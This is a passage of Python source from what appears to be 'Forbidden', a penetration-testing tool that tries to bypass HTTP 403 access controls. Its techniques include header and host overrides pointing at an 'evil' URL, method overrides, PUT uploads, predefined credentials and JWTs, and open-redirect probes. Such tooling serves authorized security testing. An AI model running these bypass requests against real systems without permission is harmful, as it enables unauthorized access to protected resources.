	For example, from any path to '[/path/, /path, path/, path]', etc., or if the path is an empty string, to '[/]'.\n
	If specified, the query string must start with '?'.\n
	If specified, the fragment must start with '#'.\n
	Returns a unique list of relative URL paths with and without the URL parameters.
	"""
	path = path_no_parameters.strip(SEP)
	tmp = [SEP + path + SEP, SEP + path, path + SEP, path] if path else [SEP]
	if query_string or fragment:
		tmp = [entry + query_string + fragment for entry in tmp] + tmp
	return array.unique(tmp)

def get_recursive(path_no_parameters: str):
	"""
	Get all relative URL paths recursively for each directory in the URL path with and without the ending forward slash.\n
	Returns a unique list.
	"""
	end_no_sep = ""
	end_sep = SEP
	tmp = [end_no_sep, end_sep]
	path = path_no_parameters.strip(SEP)
	if path:
		for directory in path.split(SEP):
			end_no_sep += SEP + directory
			end_sep += directory + SEP
			tmp.extend([end_no_sep, end_sep])
	tmp.reverse()
	return array.unique(tmp)



#!/usr/bin/env python3

from . import general, grep

import typing

def get_key_value(cookie: str):
	"""
	Get a key-value pair from an HTTP cookie.\n
	Returns an empty key-value pair on failure.
	"""
	key = ""; value = ""
	if grep.search(cookie, r"^[^\=\;]+\=[^\=\;]+$|^[^\=\;]+\=$"):
		key, value = cookie.split("=", 1)
	return key.strip(), value.strip()

def format_key_value(key: str, value: typing.Any):
	"""
	Returns a key-value pair of an HTTP cookie as a string.
	"""
	return f"{key}={value}"

def to_dict_duplicate(cookies: list[str]) -> dict[str, str]:
	"""
	Convert a list of HTTP cookies into a dictionary while preserving duplicate HTTP cookies.
	"""
	tmp = {}
	exists = set()
	for cookie in cookies:
		key, value = get_key_value(cookie)
		tmp[key if key not in exists and not exists.add(key) else general.UniqueString(key)] = value
	return tmp

def to_string(cookies: list[str]):
	"""
	Convert a list of HTTP cookies into a string.
	"""
	return ("; ").join(cookies)



#!/usr/bin/env python3

from .       import array, cookie, encode, general, grep, header, path, report, test, value
from .record import Records
from .url    import URL, Scheme

import alive_progress, concurrent.futures, http.client, io, pycurl, random, requests, ssl, time

requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

# ----------------------------------------

class Forbidden:

	def __init__(
		self,
		url              : str,
		ignore_parameters: bool,
		ignore_requests  : bool,
		tests            : list[general.Test],
		values           : list[str],
		force            : str,
		paths            : list[str],
		evil             : str,
		headers          : list[str],
		cookies          : list[str],
		ignore_regex     : str,
		content_lengths  : list[int | general.ContentLength],
		request_timeout  : int,
		sleep            : int,
		user_agents      : list[str],
		proxy            : str,
		status_codes     : list[general.StatusCode],
		debug            : bool
	):
		"""
		Class for managing the tool.
		"""
		self.__url                   = URL(url, ignore_parameters)
		self.__tests                 = tests
		self.__values                = values
		self.__force                 = force
		self.__accessible            = path.join_multiple(self.__url.domain.scheme_domain_port, paths)
		self.__accessible_scope      = [general.Test.PATH_OVERRIDES]
		self.__evil                  = URL(evil)
		self.__evil_scope            = [general.Test.HOST_OVERRIDES, general.Test.HEADERS, general.Test.BEARER_AUTHS, general.Test.REDIRECTS, general.Test.PARSERS]
		self.__headers               = headers
		self.__cookies               = cookies
		self.__ignore                = ignore_regex
		self.__content_lengths       = content_lengths
		self.__sleep                 = sleep
		self.__user_agents           = user_agents
		self.__user_agents_len       = len(self.__user_agents)
		self.__proxy                 = proxy
		self.__status_codes          = status_codes
		self.__debug                 = debug
		# --------------------------------
		self.__engine                = general.Engine.PYCURL if ignore_requests else general.Engine.PYTHON_REQUESTS
		self.__verify                = False
		self.__allow_redirects       = True
		self.__max_redirects         = 10
		self.__connect_timeout       = request_timeout
		self.__read_timeout          = request_timeout
		# --------------------------------
		self.__default_method        = "GET"
		self.__main_method           = self.__force or self.__default_method
		self.__allowed_methods       = []
		self.__allowed_methods_scope = [general.Test.METHODS, general.Test.METHOD_OVERRIDES]
		# --------------------------------
		self.__collection            = Records()

	# ------------------------------------

	def __check_scope(self, scope: list[general.Test]):
		"""
		Check if any of the tests are in scope.
		"""
		return any(test in scope for test in self.__tests)

	def __replace_content_length(self, content_length_enum: general.ContentLength, content_length_value: int):
		"""
		Replace a content length enum with a content length value in the content lengths list.
		"""
		self.__content_lengths[self.__content_lengths.index(content_length_enum)] = content_length_value
		self.__content_lengths = list(set(self.__content_lengths))

	def __wait(self):
		"""
		Wait for a period of time.
		"""
		if self.__sleep > 0:
			time.sleep(self.__sleep)

	def __print_debug(self, record: Records.Record):
		"""
		If debugging is enabled, print a test record information and an error message - if any.
		"""
		if self.__debug and record.error:
			general.print_yellow(f"[ DEBUG ] {record.id}: {record.command}")
			general.print_cyan(record.error)

	# ------------------------------------

	def run(self, threads: int, show_table = False, dump = False):
		"""
		Run the tool.
		"""
		results = []
		if self.__validate_inaccessible_url() and self.__validate_evil_url() and self.__validate_accessible_urls():
			self.__fetch_allowed_http_methods()
			self.__prepare_test_records()
			if not self.__collection.len() > 0:
				print("No test records were created")
			else:
				self.__collection.unique()
				general.print_cyan(f"Number of created test records: {self.__collection.len()}")
				if dump:
					print(general.get_timestamp("Dumping the test records in the output file..."))
					results = self.__collection.get_tests()
				else:
					self.__run_tests(threads)
					tmp = report.Report(self.__collection, self.__status_codes)
					results = tmp.show(show_table)
					tmp.show_statistics()
		return results

	def __run_tests(self, threads: int):
		"""
		Run all the tests.
		"""
		print(general.get_timestamp(f"Running tests using the {self.__engine.get_title()} engine..."))
		print("Press CTRL + C to exit early - results will be saved")
		with alive_progress.alive_bar(self.__collection.len(), title = "Progress:") as bar:
			with concurrent.futures.ThreadPoolExecutor(max_workers = threads) as executor:
				subprocesses = []
				try:
					for record in self.__collection.get():
						subprocesses.append(executor.submit(getattr(self, record.engine.get_method()), record))
					for subprocess in concurrent.futures.as_completed(subprocesses):
						record = subprocess.result()
						self.__print_debug(record)
						bar()
				except KeyboardInterrupt:
					executor.shutdown(wait = True, cancel_futures = True)

	# ------------------------------------

	def __validate_inaccessible_url(self):
		"""
		Validate the inaccessible URL.
		"""
		success = True
		general.print_cyan(f"Normalized inaccessible URL: {self.__url.full.initial.domain}")
		if not self.__url.ip.ip:
			general.print_red("Could not fetch the IP address of the inaccessible URL, the tool will now exit...")
			success = False
		else:
			print(general.get_timestamp(f"Validating the inaccessible URL using the HTTP {self.__main_method} method..."))
			record = self.__send(
				url    = self.__url.full.initial.domain,
				method = self.__main_method,
				ignore = False
			)
			if record.status == general.ErrorCode.ERROR.value:
				general.print_red("Inaccessible URL is not valid, the tool will now exit...")
				success = False
			elif general.ContentLength.INITIAL in self.__content_lengths:
				general.print_green(f"Ignoring the inaccessible URL response content length: {record.length}")
				self.__replace_content_length(general.ContentLength.INITIAL, record.length)
		return success

	def __validate_evil_url(self):
		"""
		Validate the evil URL.
		"""
		success = True
		if self.__check_scope(self.__evil_scope):
			general.print_cyan(f"Normalized evil URL: {self.__evil.full.initial.domain}")
			if not self.__evil.ip.ip:
				general.print_red("Could not fetch the IP address of the evil URL, the tool will now exit...")
				success = False
			else:
				print(general.get_timestamp(f"Validating the evil URL using the HTTP {self.__default_method} method..."))
				record = self.__send(
					url    = self.__evil.full.initial.domain,
					method = self.__default_method,
					ignore = True
				)
				if record.status == general.ErrorCode.ERROR.value:
					general.print_red("Evil URL is not valid, the tool will now exit...")
					success = False
				elif record.status == general.ErrorCode.IGNORED.value:
					general.print_red("Evil URL is being ignored, please adjust your options and try again, the tool will now exit...")
					success = False
		return success

	def __validate_accessible_urls(self):
		"""
		Validate the accessible URLs.
		"""
		success = True
		if self.__check_scope(self.__accessible_scope):
			# ----------------------------
			urls = self.__accessible
			length = len(urls)
			self.__accessible = ""
			# ----------------------------
			if length == 1:
				general.print_cyan(f"Normalized accessible URL: {urls[0]}")
				print(general.get_timestamp(f"Validating the accessible URL using the HTTP {self.__default_method} method..."))
				record = self.__send(
					url    = urls[0],
					method = self.__default_method,
					ignore = False
				)
				if record.status == general.ErrorCode.ERROR.value:
					general.print_red("Accessible URL is not valid, the tool will now exit...")
					success = False
				elif record.status >= 200 and record.status < 300:
					self.__accessible = record.url
					if general.ContentLength.PATH in self.__content_lengths:
						general.print_green(f"Ignoring the accessible URL response content length: {record.length}")
						self.__replace_content_length(general.ContentLength.PATH, record.length)
				else:
					general.print_red("Accessible URL did not return 2xx HTTP response status code, the tool will now exit...")
					success = False
			# ----------------------------
			elif length > 1:
				general.print_cyan(f"Using the following built-in accessible URLs:{chr(10)}{(chr(10)).join(urls)}")
				print(general.get_timestamp(f"Validating the built-in accessible URLs using the HTTP {self.__default_method} method..."))
				for url in urls:
					record = self.__send(
						url    = url,
						method = self.__default_method,
						ignore = False
					)
					if record.status >= 200 and record.status < 300:
						general.print_green(f"Accessible URL was found: {record.url}")
						self.__accessible = record.url
						if general.ContentLength.PATH in self.__content_lengths:
							general.print_green(f"Ignoring the accessible URL response content length: {record.length}")
							self.__replace_content_length(general.ContentLength.PATH, record.length)
						break
				if not self.__accessible:
					general.print_yellow("No accessible URL was found, moving on...")
			# ----------------------------
		return success

	def __fetch_allowed_http_methods(self):
		"""
		Fetch the allowed HTTP methods.
		"""
		if self.__force:
			general.print_cyan(f"Forcing the HTTP {self.__main_method} method for all non-specific tests...")
			self.__allowed_methods = [self.__main_method]
		elif self.__check_scope(self.__allowed_methods_scope):
			print(general.get_timestamp(f"Fetching the allowed HTTP methods..."))
			record = self.__send(
				url                   = self.__url.full.initial.domain,
				method                = "OPTIONS",
				ignore                = False,
				keep_response_headers = True
			)
			if record.status > 0:
				value = header.find(record.response_headers, "allow")
				if value:
					for method in value.split(","):
						method = method.strip().upper()
						if method and method not in self.__allowed_methods:
							self.__allowed_methods.append(method)
			if not self.__allowed_methods:
				general.print_yellow(f"Could not fetch the allowed HTTP methods, using the default HTTP {self.__main_method} method instead and moving on...")
				self.__allowed_methods = [self.__main_method]
			else:
				general.print_green(f"Allowed HTTP methods: [{(', ').join(self.__allowed_methods)}]")

	# ------------------------------------

	def __send(self, url: str, method = "", headers: list[str] = [], cookies: list[str] = [], body = "", ignore = True, keep_response_headers = False, keep_response_body = False) -> Records.Record:
		"""
		Send an HTTP request using the default HTTP request engine.\n
		Used for initial validation.
		"""
		record = self.__record("SYSTEM-0", url, method, headers, cookies, body)
		method = getattr(self, record.engine.get_method())
		record = method(record, ignore, keep_response_headers, keep_response_body)
		self.__print_debug(record)
		return record

	# ------------------------------------

	def __records(self, id: str, url: str | list[str], method: str | list[str] = [""], headers: list[str] | list[list[str]] = [[]], cookies: list[str] | list[list[str]] = [[]], body: str | list[str] = [""], engine: general.Engine = None):
		"""
		Create multiple test records and add them to the collection.
		"""
		urls    =  array.to_array(url   )
		methods =  array.to_array(method)
		headers = [array.to_array(header) for header in headers]
		cookies = [array.to_array(cookie) for cookie in cookies]
		bodies  =  array.to_array(body  )
		# --------------------------------
		for __url in urls:
			for __method in methods:
				for __headers in headers:
					for __cookies in cookies:
						for __body in bodies:
							self.__collection.append(self.__record(id, __url, __method, __headers, __cookies, __body, engine))

	def __record(self, id: str, url: str, method = "", headers: list[str] = [], cookies: list[str] = [], body = "", engine: general.Engine = None):
		"""
		Get a test record.
		"""
		return Records.Record(id, url, method or self.__main_method, self.__validate_headers(headers), self.__validate_cookies(cookies), body, self.__get_user_agent(), self.__proxy, engine or self.__engine)

	def __validate_headers(self, headers: list[str] = []) -> list[str]:
		"""
		Add user-supplied HTTP request headers to test-specific HTTP request headers.\n
		Important, user-supplied HTTP request headers cannot override test-specific HTTP request headers.
		"""
		tmp = []
		exists = set(header.Header.all_lower())
		# --------------------------------
		# NOTE: Test-specific.
		for entry in headers:
			key, value = header.get_key_value(entry)
			if key:
				exists.add(key.lower())
				tmp.append(header.format_key_value(key, value))
		# --------------------------------
		# NOTE: User-supplied.
		for entry in self.__headers:
			key, value = header.get_key_value(entry)
			if key and key.lower() not in exists:
				tmp.append(header.format_key_value(key, value))
		# --------------------------------
		return tmp

	def __validate_cookies(self, cookies: list[str] = []) -> list[str]:
		"""
		Add user-supplied HTTP cookies to test-specific HTTP cookies.\n
		Important, user-supplied HTTP cookies cannot override test-specific HTTP cookies.
		"""
		tmp = []
		exists = set()
		# --------------------------------
		# NOTE: Test-specific.
		for entry in cookies:
			key, value = cookie.get_key_value(entry)
			if key:
				exists.add(key.lower())
				tmp.append(cookie.format_key_value(key, value))
		# --------------------------------
		# NOTE: User-supplied.
		for entry in self.__cookies:
			key, value = cookie.get_key_value(entry)
			if key and key.lower() not in exists:
				tmp.append(cookie.format_key_value(key, value))
		# --------------------------------
		return tmp

	def __get_user_agent(self):
		"""
		Get a [random] user agent.\n
		Returns an empty string if there are no user agents.
		"""
		user_agent = ""
		if self.__user_agents_len > 0:
			user_agent = self.__user_agents[random.randint(0, self.__user_agents_len - 1)]
		return user_agent

	# ------------------------------------

	def __send_pycurl(self, record: Records.Record, ignore = True, keep_response_headers = False, keep_response_body = False):
		"""
		Send an HTTP request using PycURL.
		"""
		curl    = None
		headers = None
		body    = None
		try:
			# ----------------------------
			self.__wait()
			# ----------------------------
			curl    = pycurl.Curl()
			headers = io.BytesIO()
			body    = io.BytesIO()
			# ----------------------------
			curl.setopt(pycurl.HEADERFUNCTION, headers.write            )
			curl.setopt(pycurl.WRITEFUNCTION , body.write               )
			curl.setopt(pycurl.FOLLOWLOCATION, self.__allow_redirects   )
			curl.setopt(pycurl.MAXREDIRS     , self.__max_redirects     )
			curl.setopt(pycurl.CONNECTTIMEOUT, self.__connect_timeout   )
			curl.setopt(pycurl.TIMEOUT       , self.__read_timeout      )
			curl.setopt(pycurl.PATH_AS_IS    , True                     ) # NOTE: Avoiding URL normalization.
			curl.setopt(pycurl.URL           , record.url               )
			curl.setopt(pycurl.CUSTOMREQUEST , record.method            )
			curl.setopt(pycurl.NOBODY        , record.method in ["HEAD"])
			curl.setopt(pycurl.COOKIESESSION , True                     )
			curl.setopt(pycurl.COOKIEJAR     , ""                       ) # NOTE: Setting an empty string to use in-memory storage.
			# ----------------------------
			if not self.__verify:
				curl.setopt(pycurl.SSL_VERIFYHOST      , False)
				curl.setopt(pycurl.SSL_VERIFYPEER      , False)
				curl.setopt(pycurl.PROXY_SSL_VERIFYHOST, False)
				curl.setopt(pycurl.PROXY_SSL_VERIFYPEER, False)
			# ----------------------------
			# NOTE: If 'User-Agent' HTTP request header is set in 'record.headers', it will override the one from 'record.user_agent'.
			# NOTE: If 'Cookie' HTTP request header is set in 'record.headers', it will override the one from 'record.cookie'.
			# NOTE: Where applicable, encode Unicode characters.
			curl.setopt(pycurl.PROXY     , record.proxy                           if record.proxy      else ""  )
			curl.setopt(pycurl.USERAGENT , record.user_agent                      if record.user_agent else ""  )
			curl.setopt(pycurl.COOKIE    , cookie.to_string(record.cookies)       if record.cookies    else None)
			curl.setopt(pycurl.HTTPHEADER, encode.encode_multiple(record.headers) if record.headers    else None)
			# ----------------------------
			# NOTE: If no 'Content-Type' HTTP request header is set, 'Content-Type: application/x-www-form-urlencoded' is set by default.
			if record.body:
				curl.setopt(pycurl.POST      , True       )
				curl.setopt(pycurl.POSTFIELDS, record.body)
			# ----------------------------
			curl.perform()
			# ----------------------------
			record.status = int(curl.getinfo(pycurl.RESPONSE_CODE))
			record.length = int(curl.getinfo(pycurl.SIZE_DOWNLOAD))
			# ----------------------------
			# NOTE: Does not automatically decode the response headers nor body.
			record.response_headers, ignored      = encode.decode(headers.getvalue())
			record.response        , record.error = encode.decode(body.getvalue())
			# ----------------------------
			self.__validate_response(record, ignore, keep_response_headers, keep_response_body)
			# ----------------------------
		except (pycurl.error, OSError) as ex:
			# ----------------------------
			record.error  = str(ex)
			record.status = general.ErrorCode.ERROR.value
			# ----------------------------
		finally:
			# ----------------------------
			if body:
				body.close()
			# ----------------------------
			if headers:
				headers.close()
			# ----------------------------
			if curl:
				curl.close()
			# ----------------------------
		return record

	def __send_python_requests(self, record: Records.Record, ignore = True, keep_response_headers = False, keep_response_body = False):
		"""
		Send an HTTP request using Python Requests.
		"""
		session  = None
		response = None
		try:
			# ----------------------------
			self.__wait()
			# ----------------------------
			session                 = requests.Session()
			session.verify          = self.__verify
			session.max_redirects   = self.__max_redirects
			session.proxies["http"] = session.proxies["https"] = record.proxy
			session.cookies.update(cookie.to_dict_duplicate(record.cookies))
			# ----------------------------
			# NOTE: If 'User-Agent' HTTP request header is set in 'record.headers', it will override the one from 'record.user_agent'.
			# NOTE: If 'Cookie' HTTP request header is set in 'record.headers', it will override the one from 'record.cookie'.
			# NOTE: Where applicable, encode Unicode characters.
			# NOTE: No 'Content-Type' HTTP request header is set by default.
			request = requests.Request(
				method = record.method,
				url    = record.url,
				data   = record.body
			)
			if record.user_agent:
				request.headers[header.Header.USER_AGENT.value] = record.user_agent
			for key, value in header.to_dict_duplicate(record.headers).items():
				request.headers[key] = encode.encode(value)
			# ----------------------------
			# NOTE: Avoiding URL normalization. Similar to '--path-as-is' in PycURL.
			prepared_request     = session.prepare_request(request)
			prepared_request.url = record.url
			# ----------------------------
			response = session.send(
				request         = prepared_request,
				allow_redirects = self.__allow_redirects,
				timeout         = (self.__connect_timeout, self.__read_timeout)
			)
			# ----------------------------
			record.status = response.status_code
			record.length = len(response.content)
			# ----------------------------
			# NOTE: Does automatically decode the response headers and body.
			record.response_headers = dict(response.headers)
			record.response         = response.text
			# ----------------------------
			self.__validate_response(record, ignore, keep_response_headers, keep_response_body)
			# ----------------------------
		except (requests.exceptions.RequestException, requests.packages.urllib3.exceptions.HTTPError) as ex:
			# ----------------------------
			record.error  = str(ex)
			record.status = general.ErrorCode.ERROR.value
			# ----------------------------
		finally:
			# ----------------------------
			if response:
				response.close()
			# ----------------------------
			if session:
				session.close()
			# ----------------------------
		return record

	def __send_http_client(self, record: Records.Record, ignore = True, keep_response_headers = False, keep_response_body = False):
		"""
		Send an HTTP request using HTTP Client.\n
		Used to test HTTP/1.0 protocol downgrades.\n
		Does not support a web proxy.
		"""
		connection = None
		response   = None
		try:
			# ----------------------------
			self.__wait()
			# ----------------------------
			"""
			NOTE: For debugging.
			url        = u.URL(record.url)
			proxy      = u.URL(record.proxy)
			connection = connection = http.client.HTTPSConnection(proxy.domain.domain, proxy.port, timeout = self.__connect_timeout, context = None if self.__verify else ssl._create_unverified_context())
			connection.set_tunnel(url.domain.domain, url.port)
			"""
			url        = URL(record.url)
			connection = http.client.HTTPSConnection(url.domain.domain, url.port, timeout = self.__connect_timeout, context = None if self.__verify else ssl._create_unverified_context()) if url.is_https() else http.client.HTTPConnection(url.domain.domain, url.port, timeout = self.__connect_timeout)
			# ----------------------------
			connection._http_vsn     = 10
			connection._http_vsn_str = "HTTP/1.0"
			# ----------------------------
			# NOTE: If 'User-Agent' HTTP request header is set in 'record.headers', it will override the one from 'record.user_agent'.
			# NOTE: If 'Cookie' HTTP request header is set in 'record.headers', it will override the one from 'record.cookie'.
			# NOTE: Value encoding is not supported.
			headers = {}
			if record.user_agent:
				headers[header.Header.USER_AGENT.value] = record.user_agent
			if record.cookies:
				headers[header.Header.COOKIE.value] = cookie.to_string(record.cookies)
			for key, value in header.to_dict_duplicate(record.headers).items():
				headers[key] = value
			# ----------------------------
			# NOTE: Does not normalize URLs.
			# NOTE: No 'Content-Type' HTTP request header is set by default.
			connection.request(
				method  = record.method,
				url     = url.path.path,
				headers = headers,
				body    = record.body or None
			)
			# ----------------------------
			# NOTE: Does not automatically decode the response body.
			response                      = connection.getresponse()
			record.status                 = response.status
			record.response_headers       = dict(response.getheaders())
			record.response               = response.read()
			record.length                 = len(record.response)
			record.response, record.error = encode.decode(record.response)
			# ----------------------------
			self.__validate_response(record, ignore, keep_response_headers, keep_response_body)
			# ----------------------------
		except (http.client.HTTPException, OSError) as ex:
			# ----------------------------
			record.error  = str(ex)
			record.status = general.ErrorCode.ERROR.value
			# ----------------------------
		finally:
			# ----------------------------
			if response:
				response.close()
			# ----------------------------
			if connection:
				connection.close()
			# ----------------------------
		return record

	def __validate_response(self, record: Records.Record, ignore = True, keep_response_headers = False, keep_response_body = False):
		"""
		Validate an HTTP response.
		"""
		# --------------------------------
		if record.error:
			record.status = general.ErrorCode.ERROR.value
		elif ignore and (record.length in self.__content_lengths or self.__ignore and grep.search(record.response, self.__ignore)):
			record.status = general.ErrorCode.IGNORED.value
		# --------------------------------
		if not keep_response_headers:
			record.response_headers = ""
		if not keep_response_body:
			record.response = ""
		# --------------------------------

	# ------------------------------------

	def __prepare_test_records(self):
		"""
		Prepare test records.
		"""
		print(general.get_timestamp("Preparing test records..."))
		# --------------------------------
		if self.__check_scope([general.Test.PROTOCOLS]):
			# NOTE: Test HTTP and HTTPS protocols using an IP address and domain name.
			self.__records(
				id  = "PROTOCOLS-1",
				url = array.unique(self.__url.full.domain.all + self.__url.full.ip.all)
			)
			# NOTE: Test an HTTP/1.0 protocol downgrade without the 'Host' HTTP request header, using an IP address and domain name.
			self.__records(
				id     = "PROTOCOLS-2",
				url    = self.__url.full.initial.all,
				engine = general.Engine.HTTP_CLIENT
			)
		# --------------------------------
		if self.__check_scope([general.Test.METHODS]):
			# NOTE: Test the allowed HTTP methods.
			self.__records(
				id     = "METHODS-1",
				url    = self.__url.full.initial.domain,
				method = self.__allowed_methods
			)
			# NOTE: Test the allowed HTTP methods using the 'Content-Length: 0' HTTP request header.
			self.__records(
				id      = "METHODS-2",
				url     = self.__url.full.initial.domain,
				method  = self.__allowed_methods,
				headers = ["Content-Length: 0"]
			)
			# NOTE: Test Cross-Site Tracing (XST) using the HTTP TRACE and TRACK methods.
			# NOTE: To confirm the vulnerability, check if the 'XST: XST' HTTP response header is sent back.
			self.__records(
				id      = "METHODS-3",
				url     = self.__url.full.initial.domain,
				method  = ["TRACE", "TRACK"],
				headers = ["XST: XST"]
			)
		# --------------------------------
		if self.__check_scope([general.Test.UPLOADS]):
			# NOTE: Test a text file upload recursively for each directory in the URL path using the HTTP PUT method.
			# NOTE: Semi-colon in 'Content-Type;' will expand to an empty HTTP request header.
			self.__records(
				id      = "UPLOADS-1",
				url     = test.get_file_upload_urls(self.__url, "/pentest.txt"),
				method  = "PUT",
				headers = ["Content-Type;", "Content-Type: text/plain"],
				body    = "pentest"
			)
		# --------------------------------
		if self.__check_scope([general.Test.METHOD_OVERRIDES]):
			# NOTE: Test HTTP method overrides using URL query string parameters.
			self.__records(
				id     = "METHOD-OVERRIDES-1",
				url    = test.get_method_override_urls(self.__url, self.__allowed_methods + value.values.methods),
				method = self.__allowed_methods
			)
			# NOTE: Test HTTP method overrides using HTTP request headers.
			self.__records(
				id      = "METHOD-OVERRIDES-2",
				url     = self.__url.full.initial.domain,
				method  = self.__allowed_methods,
				headers = test.get_method_override_headers(self.__allowed_methods + value.values.methods)
			)
			# NOTE: Test HTTP method overrides using HTTP request bodies.
			self.__records(
				id      = "METHOD-OVERRIDES-3",
				url     = self.__url.full.initial.domain,
				method  = "POST",
				headers = ["Content-Type: application/x-www-form-urlencoded"],
				body    = test.get_method_override_bodies(self.__allowed_methods + value.values.methods)
			)
		# --------------------------------
		if self.__check_scope([general.Test.SCHEME_OVERRIDES]):
			# NOTE: Test URL scheme overrides using HTTP request headers, from HTTPS to HTTP.
			self.__records(
				id      = "SCHEME-OVERRIDES-1",
				url     = self.__url.full.domain.https,
				headers = test.get_scheme_override_headers(Scheme.HTTP)
			)
			# NOTE: Test URL scheme overrides using HTTP request headers, from HTTP to HTTPS.
			self.__records(
				id      = "SCHEME-OVERRIDES-2",
				url     = self.__url.full.domain.http,
				headers = test.get_scheme_override_headers(Scheme.HTTPS)
			)
		# --------------------------------
		if self.__check_scope([general.Test.PORT_OVERRIDES]):
			# NOTE: Test port overrides using HTTP request headers.
			self.__records(
				id      = "PORT-OVERRIDES-1",
				url     = self.__url.full.initial.domain,
				headers = test.get_port_override_headers([self.__url.port] + value.values.ports)
			)
		# --------------------------------
		if self.__check_scope([general.Test.HOST_OVERRIDES]):
			# NOTE: Test HTTP host overrides using HTTP request headers.
			self.__records(
				id      = "HOST-OVERRIDES-1",
				url     = self.__url.full.initial.domain,
				headers = test.get_host_override_headers(value.get_hosts(self.__url, self.__evil))
			)
			# NOTE: Test HTTP host overrides using two 'Host' HTTP request headers.
			self.__records(
				id      = "HOST-OVERRIDES-2",
				url     = self.__url.full.initial.domain,
				headers = test.get_two_host_headers(self.__url, self.__evil),
				engine  = general.Engine.PYTHON_REQUESTS
			)
		# --------------------------------
		if self.__check_scope([general.Test.PATH_OVERRIDES]):
			# NOTE: Test URL path overrides using HTTP request headers with relative URL paths, using an accessible URL.
			if self.__accessible:
				self.__records(
					id      = "PATH-OVERRIDES-1",
					url     = self.__accessible,
					headers = test.get_path_override_headers(value.get_relative_paths(self.__url))
				)
			# NOTE: Test URL path overrides using HTTP request headers with relative URL paths, using a root URL.
			self.__records(
				id      = "PATH-OVERRIDES-2",
				url     = self.__url.domain.scheme_domain_port,
				headers = test.get_path_override_headers(value.get_relative_paths(self.__url))
			)
			# NOTE: Test URL path overrides using HTTP request headers with relative URL paths, using a full URL.
			self.__records(
				id      = "PATH-OVERRIDES-3",
				url     = self.__url.full.initial.domain,
				headers = test.get_path_override_headers(value.get_relative_paths(self.__url))
			)
		# --------------------------------
		if self.__check_scope([general.Test.HEADERS]):
			# NOTE: Test HTTP request headers with IP addresses.
			self.__records(
				id      = "HEADERS-1",
				url     = self.__url.full.initial.domain,
				headers = test.get_ip_headers(value.get_ips(self.__url, self.__evil))
			)
			# NOTE: Test HTTP request headers with comma-separated IP addresses.
			self.__records(
				id      = "HEADERS-2",
				url     = self.__url.full.initial.domain,
				headers = test.get_multi_ip_headers(value.get_multi_ips(self.__url))
			)
			# NOTE: Test HTTP request headers with IP addresses and domain names.
			self.__records(
				id      = "HEADERS-3",
				url     = self.__url.full.initial.domain,
				headers = test.get_host_override_headers(value.get_hosts(self.__url, self.__evil))
			)
			# NOTE: Test HTTP request headers with IP addresses and domain names.
			self.__records(
				id      = "HEADERS-4",
				url     = self.__url.full.initial.domain,
				headers = test.get_host_headers(value.get_hosts(self.__url, self.__evil))
			)
			# NOTE: Test HTTP request headers with root URLs.
			self.__records(
				id      = "HEADERS-5",
				url     = self.__url.full.initial.domain,
				headers = test.get_root_url_headers(value.get_root_urls(self.__url, self.__evil))
			)
			# NOTE: Test HTTP request headers with full URLs.
			self.__records(
				id      = "HEADERS-6",
				url     = self.__url.full.initial.domain,
				headers = test.get_path_override_headers(value.get_full_urls(self.__url, self.__evil))
			)
			# NOTE: Test HTTP request headers with full URLs.
			self.__records(
				id      = "HEADERS-7",
				url     = self.__url.full.initial.domain,
				headers = test.get_full_url_headers(value.get_full_urls(self.__url, self.__evil))
			)
			# NOTE: Test HTTP request headers with special values.
			self.__records(
				id      = "HEADERS-8",
				url     = self.__url.full.initial.domain,
				headers = test.get_special_headers(self.__url, self.__evil)
			)
		# --------------------------------
		if self.__check_scope([general.Test.IP_VALUES]):
			if self.__values:
				# NOTE: Test HTTP request headers with user-supplied IP addresses.
				self.__records(
					id      = "IP-VALUES-1",
					url     = self.__url.full.initial.domain,
					headers = test.get_ip_headers(self.__values)
				)
		if self.__check_scope([general.Test.HOST_VALUES]):
			if self.__values:
				# NOTE: Test HTTP request headers with user-supplied IP addresses and domain names.
				self.__records(
					id      = "HOST-VALUES-1",
					url     = self.__url.full.initial.domain,
					headers = test.get_host_override_headers(self.__values)
				)
				# NOTE: Test HTTP request headers with user-supplied IP addresses and domain names.
				self.__records(
					id      = "HOST-VALUES-2",
					url     = self.__url.full.initial.domain,
					headers = test.get_host_headers(self.__values)
				)
		# --------------------------------
		if self.__check_scope([general.Test.URL_VALUES]):
			if self.__values:
				# NOTE: Test HTTP request headers with user-supplied root URLs.
				self.__records(
					id      = "URL-VALUES-1",
					url     = self.__url.full.initial.domain,
					headers = test.get_root_url_headers(self.__values)
				)
				# NOTE: Test HTTP request headers with user-supplied full URLs.
				self.__records(
					id      = "URL-VALUES-2",
					url     = self.__url.full.initial.domain,
					headers = test.get_path_override_headers(self.__values)
				)
				# NOTE: Test HTTP request headers with user-supplied full URLs.
				self.__records(
					id      = "URL-VALUES-3",
					url     = self.__url.full.initial.domain,
					headers = test.get_full_url_headers(self.__values)
				)
		# --------------------------------
		if self.__check_scope([general.Test.PATHS, general.Test.PATHS_RAM]):
			# NOTE: Test URL path bypasses.
			self.__records(
				id  = "PATHS-1",
				url = test.get_path_bypass_urls(self.__url, general.Test.PATHS not in self.__tests)
			)
		# --------------------------------
		if self.__check_scope([general.Test.ENCODINGS]):
			# NOTE: Test URL host and path transformations and encodings.
			self.__records(
				id     = "ENCODINGS-1",
				url    = test.get_encoded_urls(self.__url),
				engine = general.Engine.PYCURL
			)
		# --------------------------------
		if self.__check_scope([general.Test.BASIC_AUTHS]):
			# NOTE: Test basic authentication/authorization using HTTP request headers with null values and predefined Base64 encoded credentials.
			self.__records(
				id      = "BASIC-AUTHS-1",
				url     = self.__url.full.initial.domain,
				headers = test.get_basic_auth_headers(value.get_basic_credentials())
			)
		# --------------------------------
		if self.__check_scope([general.Test.BEARER_AUTHS]):
			# NOTE: Test bearer authentication/authorization using HTTP request headers with null values, malformed JWTs, and predefined JWTs.
			self.__records(
				id      = "BEARER-AUTHS-1",
				url     = self.__url.full.initial.domain,
				headers = test.get_bearer_auth_headers(value.get_bearer_credentials(self.__url, self.__evil))
			)
		# --------------------------------
		if self.__check_scope([general.Test.REDIRECTS]):
			# NOTE: Test open redirects using HTTP request headers with redirect IP addresses.
			self.__records(
				id      = "REDIRECTS-1",
				url     = self.__url.full.initial.domain,
				headers = test.get_ip_headers(value.get_redirect_ips(self.__url, self.__evil))
			)
			# NOTE: Test open redirects using HTTP request headers with redirect IP addresses and domain names.
			self.__records(
				id      = "REDIRECTS-2",
				url     = self.__url.full.initial.domain,
				headers = test.get_host_override_headers(value.get_redirect_hosts(self.__url, self.__evil))
			)
